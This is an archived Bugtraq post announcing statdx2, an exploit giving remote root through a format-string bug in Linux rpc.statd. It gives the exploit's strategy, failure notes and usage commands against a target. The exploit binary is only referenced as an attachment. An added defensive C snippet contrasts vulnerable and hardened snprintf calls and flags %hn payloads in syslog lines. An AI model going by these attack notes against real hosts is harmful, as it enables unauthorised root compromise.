5575838 2000-10-11  06:08  /110 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <13210>
Subject: statdx2 - linux rpc.statd revisited
------------------------------------------------------------
Hi.

I know this is getting old and boring now, but a lot of bugtraq
readers have sent me reports of problems experienced when auditing
their systems, and others have asked questions regarding the code's
usage. Because of the number of these emails, I decided to take down
statdx from its dusty shelf and remold it into something that will
give more bang for the buck.

You know the drill -- use only in an ethical manner, don't destroy
valuable information, even domains five levels deep at the bottom of
the global interest hierarchy don't need a tagged HTML facelift, etc.

Attached is statdx2.tar.gz. It contains the following two files:

* gdb.txt   - how to get addresses with gdb (requested often)
* statdx2.c - the exploit itself (bug fixes, new stuff)

In another instance of keyboard diarrhea, here's the new introduction:

/**
*** statdx2 (the successor of statdx)
*** Linux rpc.statd remote root exploit
*** by ron1n <shellcode@hotmail.com>
*** October 10, 2000
***
*** $ ./statdx2 -h
***
*** This version supersedes my original release. The reason I chose to
*** resurrect this stale exploit is so the new incarnation would contain
*** many improvements over the first version.
***
*** There are major changes in the algorithm used in the exploit buffer
*** construction. The format string now uses "%hn" to eradicate several
*** rare but possible problems. I didn't know about the "$" trick when I
*** wrote statdx. Even though it seems to be the new trend, I decided to
*** ignore it for this particular exploit. An additional payload has been
*** added to allow remote execution of arbitrary commands. This should help
*** when the port-binding code can't be used.
***
*** There is now primitive brute forcing code which slightly increases
*** your chances of a successful exploitation against any vulnerable i386
*** distribution of Linux. In order to implement this, the attack strategy
*** had to be altered. A progressive brute force climb down the stack to
*** hit the correct address of the saved return address will cause problems
*** when the saved frame pointer is overwritten. Instead, an overwrite of
*** the saved frame pointer is used to cause redirection in the parent
*** epilog code (see phrack-55). This is much safer to use for brute
*** forcing and has the side benefit of being an alternative avenue of
*** attack when the usual target address contains a null byte. The null
*** byte truncation problem still exists when brute forcing though, so
*** use common sense.
***
*** The information below is based on numerous questions I receive.
***
*** common reasons for failure
*** --------------------------
*** o   Confusing statd with rstatd.
*** o   Attacking an architecture that isn't i386.
*** o   Attacking an operating system that isn't Linux.
*** o   Attacking a different distribution of Linux with the
***     default Redhat exploitation variables.
*** o   Attacking a system whose statd has crashed because of
***     previous exploitation attempts, successful or not.
***     The portmapper will still advertise statd even though
***     it will remain dead until restarted.
*** o   Attacking a patched system or a system with stack
***     protection. Stack protection will defeat this exploit.
***     I have seen a way to deliver the shellcode elsewhere
***     using a different procedure call, but I am not going
***     to steal that idea.
***
*** important notes
*** ---------------
*** o   The attack may be logged in syslog target locations.
*** o   Statd is a standalone service; be careful. Brute
***     forcing can be fatal. In fact, it's highly probable
***     that it will be fatal. The brute force mode exists
***     only to introduce a behavior-based form of blind
***     debugging with crashes mapping stack frames. This is
***     very difficult to do and it requires patience, but
***     it can be done.
*** o   The nature of the vulnerability provides no means
***     to examine the stack remotely, afaik. If anyone
***     wants to drop me a free clue about this, email me.
***
*** dotslash examples
*** -----------------
*** # default Redhat attack
*** $./statdx2 -d0 target
*** # default Redhat attack; new payload
*** $./statdx2 -d0 -c "touch /blah" target
*** # saved ebp overwrite (used automatically when desirable)
*** $./statdx2 -a 0xbffff2fc -f target
*** # brute force mode -- 50 iterations (-f option implied)
*** $./statdx2 -a 0xbffff004 -n 50 -s 20 target
***
**/

(5575838) ------------------------------------------(Rewrapped)
Comment in text 5575839 by Brevbäraren (som är implementerad i) Python
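As an added example (not part of ron1n's post or of the statdx2 code), here is a C snippet that takes the defender's side of two points in the post above: the format-string shape that lets a "%hn" in untrusted input turn into a memory write versus the hardened shape that logs it verbatim, and the syslog trail the post says the attack may leave. The scanner is a heuristic of my own, the sample log lines and the rpc.statd message wording are constructed for the example, and `log_unsafe` exists only to show the vulnerable shape beside the fixed one.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count printf-style conversion directives in a string, treating "%%" as a
 * literal percent sign. *writes receives the number of %n-family directives
 * (with optional h/hh/l/ll length modifiers), the ones that turn a
 * format-string bug from a stack read into a memory write. */
int count_format_directives(const char *s, int *writes)
{
    int total = 0, w = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {            /* "%%" is an escaped percent sign */
            p++;
            continue;
        }
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*$", *q))  /* flags, width, precision */
            q++;
        while (*q && strchr("hlLqjzt", *q))            /* length modifiers */
            q++;
        if (!*q)
            break;                    /* dangling '%' at end of string */
        total++;
        if (*q == 'n')
            w++;
        p = q;
    }
    if (writes)
        *writes = w;
    return total;
}

/* Vulnerable shape: the untrusted string *is* the format string, so every
 * directive in it is interpreted. Shown for contrast only; never call it
 * with data that came from the network. */
int log_unsafe(char *out, size_t n, const char *untrusted)
{
    return snprintf(out, n, untrusted);
}

/* Hardened shape: the untrusted string is an argument to a fixed "%s"
 * format, so a "%hn" inside it is copied as text and never interpreted. */
int log_safe(char *out, size_t n, const char *untrusted)
{
    return snprintf(out, n, "%s", untrusted);
}

/* Heuristic over one syslog line: flag an rpc.statd message that carries
 * %n-family directives or non-printable bytes, neither of which belongs in
 * a hostname or monitor name. Returns 1 when suspicious, else 0. */
int suspicious_statd_line(const char *line)
{
    int writes = 0;
    if (!strstr(line, "rpc.statd"))
        return 0;
    count_format_directives(line, &writes);
    if (writes > 0)
        return 1;
    for (const unsigned char *p = (const unsigned char *)line; *p; p++)
        if (!isprint(*p) && *p != '\n' && *p != '\t')
            return 1;
    return 0;
}

/* Constructed sample syslog lines (not taken from a real system; the
 * rpc.statd message text is an assumption made for the example). */
static const char *SAMPLE_LINES[] = {
    "Oct 11 06:08:01 host rpc.statd[212]: SM_MON request for hostname fileserver.example",
    "Oct 11 06:08:02 host rpc.statd[212]: SM_MON request for hostname \x01\x02%hn%hn",
    "Oct 11 06:08:03 host sshd[300]: Accepted publickey for alice from 10.0.0.5",
    "Oct 11 06:08:04 host rpc.statd[212]: gethostbyname error for %n%n%n",
};

/* Number of sample lines the heuristic flags. */
int count_suspicious_samples(void)
{
    int n = 0;
    for (size_t i = 0; i < sizeof SAMPLE_LINES / sizeof SAMPLE_LINES[0]; i++)
        n += suspicious_statd_line(SAMPLE_LINES[i]);
    return n;
}

int main(void)
{
    char buf[128];
    log_safe(buf, sizeof buf, "%hn%hn");
    printf("logged verbatim: %s\n", buf);
    for (size_t i = 0; i < sizeof SAMPLE_LINES / sizeof SAMPLE_LINES[0]; i++)
        if (suspicious_statd_line(SAMPLE_LINES[i]))
            printf("suspicious: %s\n", SAMPLE_LINES[i]);
    return 0;
}
```

The fix in `log_safe` is the whole mitigation for this bug class: a constant format string with the untrusted data passed as an argument. The scanner is only a triage aid for the syslog side; a crashed statd that portmap still advertises (the post's "dead until restarted" case) is the other thing to watch for.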

5575839 2000-10-11  06:08  /22 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <13211>
Comment to text 5575838 by Brevbäraren (som är implementerad i) Python
Subject: Attachment (statdx2.tar.gz) to: statdx2 - linux rpc.statd revisited
------------------------------------------------------------
[binary attachment statdx2.tar.gz (gzip-compressed tar archive containing statdx2.tar); the raw bytes are not reproducible as text]
(5575839) ------------------------------------------